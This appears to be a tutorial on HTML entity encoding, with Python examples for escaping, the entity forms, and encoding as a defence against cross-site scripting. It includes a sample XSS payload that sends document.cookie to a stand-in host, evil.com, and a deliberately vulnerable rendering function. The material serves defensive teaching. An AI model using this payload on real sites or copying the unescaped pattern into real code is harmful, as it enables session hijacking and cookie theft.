What Is HTML Entity Encoding?
HTML entity encoding replaces characters that have special meaning in HTML with safe escape sequences called entities. The five most critical characters are < (becomes &lt;), > (becomes &gt;), & (becomes &amp;), " (becomes &quot;), and ' (becomes &#39; or &apos;). The ampersand must be encoded because it begins every entity, and the two quote characters matter mainly inside attribute values, where an unescaped quote would end the value early. Without encoding, a browser interprets these characters as markup rather than displayable text. If your page tries to show the literal string <script> without encoding, the browser parses it as an opening script tag and runs whatever follows as JavaScript. Entity encoding tells the browser to display the characters as-is instead of parsing them as HTML structure.
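To make the mapping concrete, here is a minimal Python sketch. The names `escape_html` and `_ENTITY_MAP` are hypothetical, chosen only for illustration; Python's standard `html.escape` does the same job and is what you would normally use. One detail worth noting: a chain of `str.replace` calls must handle `&` first, or the `&` inside an already-produced `&lt;` gets escaped again into `&amp;lt;`. `str.translate` avoids that ordering trap because it looks at each original character exactly once.

```python
import html

# Hypothetical mapping from each special character (by code point) to its entity.
# &#39; is used for the apostrophe because it works in every HTML version;
# &apos; is also valid in HTML5.
_ENTITY_MAP = {
    ord("&"): "&amp;",
    ord("<"): "&lt;",
    ord(">"): "&gt;",
    ord('"'): "&quot;",
    ord("'"): "&#39;",
}


def escape_html(text: str) -> str:
    """Replace the five HTML-special characters with entities.

    str.translate visits each character of the input once, so the '&'
    emitted as part of an entity is never escaped a second time.
    """
    return text.translate(_ENTITY_MAP)


if __name__ == "__main__":
    raw = "<script>alert('hi & bye')</script>"
    print(escape_html(raw))
    # → &lt;script&gt;alert(&#39;hi &amp; bye&#39;)&lt;/script&gt;

    # The standard library differs only in spelling the apostrophe as &#x27;.
    print(html.escape(raw, quote=True))
    # → &lt;script&gt;alert(&#x27;hi &amp; bye&#x27;)&lt;/script&gt;
```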
There are three forms of HTML entities. Named entities use a human-readable label: &amp; for the ampersand, &lt; for less-than, &copy; for the copyright symbol. The HTML5 specification lists 2,231 named character references covering mathematical symbols, currency signs, arrows, Greek letters, and much more. Decimal numeric entities use the format &#60;, where 60 is the Unicode code point in base 10. Hexadecimal numeric entities use &#x3C;, where 3C is the same code point in base 16. All three forms are valid in HTML5. Named entities are easier to read in source code; numeric entities work for any Unicode character, including obscure ones without named equivalents.
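The sketch below, again in Python and built around a hypothetical helper `entity_forms`, derives the decimal and hexadecimal forms directly from a character's code point and looks up a named form in the standard library's `html.entities.codepoint2name`. That table covers only the HTML 4 names, a subset of the HTML5 list, so a missing entry here means "no HTML 4 name", not "no name at all". `html.unescape` is used to check that every form decodes to the same character.

```python
import html
from html.entities import codepoint2name


def entity_forms(ch: str) -> dict[str, str]:
    """Return the decimal, hex, and (if known) named entity for one character.

    Hypothetical helper for illustration. Named lookups use the HTML 4 table
    in codepoint2name; the full HTML5 list is html.entities.html5.
    """
    cp = ord(ch)
    forms = {
        "decimal": f"&#{cp};",   # code point in base 10, e.g. &#60;
        "hex": f"&#x{cp:X};",    # same code point in base 16, e.g. &#x3C;
    }
    name = codepoint2name.get(cp)
    if name is not None:
        forms["named"] = f"&{name};"
    return forms


if __name__ == "__main__":
    # '<', the copyright sign, and U+2603 SNOWMAN (no HTML 4 name).
    for ch in "<\u00a9\u2603":
        forms = entity_forms(ch)
        # Every form should decode back to the original character.
        assert all(html.unescape(e) == ch for e in forms.values())
        print(ch, forms)
```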
Entity encoding is one of the foundational defenses against Cross-Site Scripting (XSS). XSS attacks inject malicious HTML or JavaScript into a page by exploiting places where user-supplied data is inserted into the page's HTML without proper encoding. A search page that reflects the query string directly into the HTML, as in <p>Results for: USER_INPUT</p>, is vulnerable if an attacker crafts a query containing <script>document.location='https://evil.com/steal?c='+document.cookie</script>. Encoding that input turns every < and > into harmless entities, so the browser renders the text instead of executing the script. OWASP ranked injection as the number one web application security risk in its 2017 Top 10, and the 2021 edition places it third while folding XSS into the same category; output encoding remains the primary mitigation for XSS.
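The search-page scenario can be reproduced in a few lines. In this Python sketch, `render_results_unsafe` and `render_results_safe` are hypothetical stand-ins for a real template; the only difference between them is whether the query passes through the standard library's `html.escape` before it is placed in the markup.

```python
import html


def render_results_unsafe(query: str) -> str:
    # VULNERABLE (hypothetical example): user input is pasted straight into markup.
    return f"<p>Results for: {query}</p>"


def render_results_safe(query: str) -> str:
    # Encode the input at the point where it enters HTML text content.
    return f"<p>Results for: {html.escape(query)}</p>"


if __name__ == "__main__":
    payload = (
        "<script>document.location='https://evil.com/steal?c='"
        "+document.cookie</script>"
    )
    print(render_results_unsafe(payload))  # contains a live <script> element
    print(render_results_safe(payload))    # the tag is now inert, visible text
```

`html.escape` is suited to HTML text and quoted attribute values. Data placed inside a `<script>` block, a URL, or CSS needs encoding appropriate to that context; HTML entities alone do not make it safe there.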